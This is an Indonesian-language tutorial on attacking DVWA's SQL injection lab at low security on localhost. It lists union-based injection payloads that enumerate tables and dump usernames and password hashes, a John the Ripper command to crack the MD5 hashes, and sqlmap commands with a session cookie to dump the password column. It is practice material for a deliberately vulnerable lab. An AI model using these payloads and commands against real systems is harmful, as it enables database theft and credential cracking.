DVWA: SQLi blind

DVWA-BLIND SQL INJECTION : LOW Level

Buka DVWA, misalnya http://localhost/DVWA-1.9

Username :  Admin
Password : Password

Pilih SQL Injection BLIND dan dalam kolom ID masukan

1' and 1=1#
1' and 1=1 order by 2 #
ID: 'or' 1=1--

Kita akan lihat ada 5 user

Melihat informasi table

1' and 1=0 union select null,table_name from information_schema.tables#
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users #

Melihat informasi table name dari table user

1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users #

Terakhir lihat username dan password

1' and 1=0 union select null,concat(first_name,0x0a,password) from users #

Crack md5 password

copy hasil password hash yang diperoleh, save misalnya dengan nama hash

Lakukan

 root@bt:/pentest/passwords/john#./john --format=raw-md5 hash

Exploit DVWA menggunakan SQLmap

Login ke DVWA
Pilih DVWA Security Low
Pada user ID tulis '1
Jalankan addon tamer di browser
Lakukan di terminal,

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="

di peroleh dari addon tamer di browser.

lihat tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables

lihat kolom di user tabel

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

lihat field password & dump

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump

Referensi

http://scxo1oc06c.blogspot.co.id/2012/02/dvwa-blind-sql-injection-low-level.html

DVWA: SQLi blind

Exploit DVWA menggunakan SQLmap

Referensi

Navigation menu

Search